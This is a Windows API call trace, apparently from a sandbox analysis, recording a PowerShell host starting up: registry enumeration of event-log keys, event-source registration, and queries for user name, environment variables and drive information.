	[0324.009] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd32c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd328, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd32c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd328*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0324.009] CoTaskMemFree (pv=0x0) 
	[0324.009] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0324.009] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x35c680, lpcchName=0x1cd3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0324.009] CoTaskMemFree (pv=0x35c680) 
	[0324.009] CoTaskMemFree (pv=0x0) 
	[0324.009] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0324.009] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x35c680, lpcchName=0x1cd3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0324.009] CoTaskMemFree (pv=0x35c680) 
	[0324.009] CoTaskMemFree (pv=0x0) 
	[0324.009] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0324.009] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x35c680, lpcchName=0x1cd3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0324.009] CoTaskMemFree (pv=0x35c680) 
	[0324.010] CoTaskMemFree (pv=0x0) 
	[0324.010] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0324.010] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x35c680, lpcchName=0x1cd3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0324.010] CoTaskMemFree (pv=0x35c680) 
	[0324.010] CoTaskMemFree (pv=0x0) 
	[0324.010] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0324.010] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x35c680, lpcchName=0x1cd3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0324.010] CoTaskMemFree (pv=0x35c680) 
	[0324.010] CoTaskMemFree (pv=0x0) 
	[0324.010] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0324.010] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x35c680, lpcchName=0x1cd3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0324.010] CoTaskMemFree (pv=0x35c680) 
	[0324.010] CoTaskMemFree (pv=0x0) 
	[0324.010] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0324.010] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x35c680, lpcchName=0x1cd3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0324.010] CoTaskMemFree (pv=0x35c680) 
	[0324.010] CoTaskMemFree (pv=0x0) 
	[0324.011] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0324.011] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x35c680, lpcchName=0x1cd3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0324.011] CoTaskMemFree (pv=0x35c680) 
	[0324.011] CoTaskMemFree (pv=0x0) 
	[0324.011] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0324.011] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x35c680, lpcchName=0x1cd3b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd3b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0324.011] CoTaskMemFree (pv=0x35c680) 
	[0324.011] CoTaskMemFree (pv=0x0) 
	[0324.011] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x374) returned 0x0
	[0324.011] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x0) returned 0x2
	[0324.011] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x37c) returned 0x0
	[0324.011] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x0) returned 0x2
	[0324.012] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x380) returned 0x0
	[0324.012] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x0) returned 0x2
	[0324.012] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x32c) returned 0x0
	[0324.012] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x0) returned 0x2
	[0324.012] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x304) returned 0x0
	[0324.012] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x0) returned 0x2
	[0324.012] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x384) returned 0x0
	[0324.012] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x0) returned 0x2
	[0324.013] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x30c) returned 0x0
	[0324.013] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x0) returned 0x2
	[0324.013] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x1a8) returned 0x0
	[0324.013] RegOpenKeyExW (in: hKey=0x1a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x0) returned 0x2
	[0324.013] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x330) returned 0x0
	[0324.013] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd418 | out: phkResult=0x1cd418*=0x334) returned 0x0
	[0324.013] RegCloseKey (hKey=0x334) returned 0x0
	[0324.013] RegCloseKey (hKey=0x378) returned 0x0
	[0324.014] RegCloseKey (hKey=0x330) returned 0x0
	[0324.768] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b890008
	[0325.656] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb8720*="WSMan", lpRawData=0x2eb8490) returned 1
	[0325.657] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0325.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.657] CoTaskMemFree (pv=0x3d2560) 
	[0325.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.659] CoTaskMemAlloc (cb=0x804) returned 0x1b42c3e0
	[0325.659] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b42c3e0, nSize=0x1cd6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd6a8) returned 0x1
	[0325.660] CoTaskMemFree (pv=0x1b42c3e0) 
	[0325.660] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0325.660] GetUserNameW (in: lpBuffer=0x35c680, pcbBuffer=0x1cd6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd6e8) returned 1
	[0325.660] CoTaskMemFree (pv=0x35c680) 
	[0325.660] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ebe100*="Alias", lpRawData=0x2ebde90) returned 1
	[0325.661] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0325.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.661] CoTaskMemFree (pv=0x3d2560) 
	[0325.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.663] CoTaskMemAlloc (cb=0x804) returned 0x1b42c3e0
	[0325.663] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b42c3e0, nSize=0x1cd6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd6a8) returned 0x1
	[0325.663] CoTaskMemFree (pv=0x1b42c3e0) 
	[0325.664] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0325.664] GetUserNameW (in: lpBuffer=0x35c680, pcbBuffer=0x1cd6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd6e8) returned 1
	[0325.664] CoTaskMemFree (pv=0x35c680) 
	[0325.664] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec36f8*="Environment", lpRawData=0x2ec3488) returned 1
	[0325.665] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0325.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.665] CoTaskMemFree (pv=0x3d2560) 
	[0325.666] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0325.666] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0325.666] CoTaskMemFree (pv=0x3d2560) 
	[0325.666] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0325.666] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0325.666] CoTaskMemFree (pv=0x3d2560) 
	[0325.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0325.666] SetErrorMode (uMode=0x1) returned 0x1
	[0325.666] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1cd460 | out: lpFileInformation=0x1cd460*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0325.667] SetErrorMode (uMode=0x1) returned 0x1
	[0325.668] GetLogicalDrives () returned 0x4
	[0325.668] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0325.670] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0325.670] SetErrorMode (uMode=0x1) returned 0x1
	[0325.671] CoTaskMemAlloc (cb=0x68) returned 0x1b409a50
	[0325.671] CoTaskMemAlloc (cb=0x68) returned 0x1b4095f0
	[0325.671] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b409a50, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1cd430, lpMaximumComponentLength=0x1cd42c, lpFileSystemFlags=0x1cd428, lpFileSystemNameBuffer=0x1b4095f0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cd430*=0x9c354b42, lpMaximumComponentLength=0x1cd42c*=0xff, lpFileSystemFlags=0x1cd428*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0325.671] CoTaskMemFree (pv=0x1b409a50) 
	[0325.671] CoTaskMemFree (pv=0x1b4095f0) 
	[0325.671] SetErrorMode (uMode=0x1) returned 0x1
	[0325.671] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0325.672] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd170, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0325.673] SetErrorMode (uMode=0x1) returned 0x1
	[0325.673] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd3d0 | out: lpFileInformation=0x1cd3d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0325.673] SetErrorMode (uMode=0x1) returned 0x1
	[0325.673] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd170, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0325.673] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd020, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0325.673] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0325.674] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0325.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0325.674] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0325.675] SetErrorMode (uMode=0x1) returned 0x1
	[0325.675] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd200 | out: lpFileInformation=0x1cd200*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0325.675] SetErrorMode (uMode=0x1) returned 0x1
	[0325.675] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0325.675] SetErrorMode (uMode=0x1) returned 0x1
	[0325.675] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd200 | out: lpFileInformation=0x1cd200*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0325.675] SetErrorMode (uMode=0x1) returned 0x1
	[0325.675] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0325.675] SetErrorMode (uMode=0x1) returned 0x1
	[0325.676] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd2a0 | out: lpFileInformation=0x1cd2a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0325.676] SetErrorMode (uMode=0x1) returned 0x1
	[0325.676] CoTaskMemAlloc (cb=0x804) returned 0x1b42c3e0
	[0325.676] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b42c3e0, nSize=0x1cd6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd6a8) returned 0x1
	[0325.676] CoTaskMemFree (pv=0x1b42c3e0) 
	[0325.676] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0325.676] GetUserNameW (in: lpBuffer=0x35c680, pcbBuffer=0x1cd6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd6e8) returned 1
	[0325.677] CoTaskMemFree (pv=0x35c680) 
	[0325.677] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eca7e8*="FileSystem", lpRawData=0x2eca578) returned 1
	[0325.678] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0325.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.678] CoTaskMemFree (pv=0x3d2560) 
	[0325.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.679] CoTaskMemAlloc (cb=0x804) returned 0x1b42c3e0
	[0325.679] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b42c3e0, nSize=0x1cd6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd6a8) returned 0x1
	[0325.680] CoTaskMemFree (pv=0x1b42c3e0) 
	[0325.680] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0325.680] GetUserNameW (in: lpBuffer=0x35c680, pcbBuffer=0x1cd6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd6e8) returned 1
	[0325.680] CoTaskMemFree (pv=0x35c680) 
	[0325.680] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed0028*="Function", lpRawData=0x2ecfdb8) returned 1
	[0325.689] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0325.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.689] CoTaskMemFree (pv=0x3d2560) 
	[0325.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0327.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0327.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0327.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0327.546] CoTaskMemAlloc (cb=0x804) returned 0x1b42c3e0
	[0327.546] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b42c3e0, nSize=0x1cd6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd6a8) returned 0x1
	[0327.546] CoTaskMemFree (pv=0x1b42c3e0) 
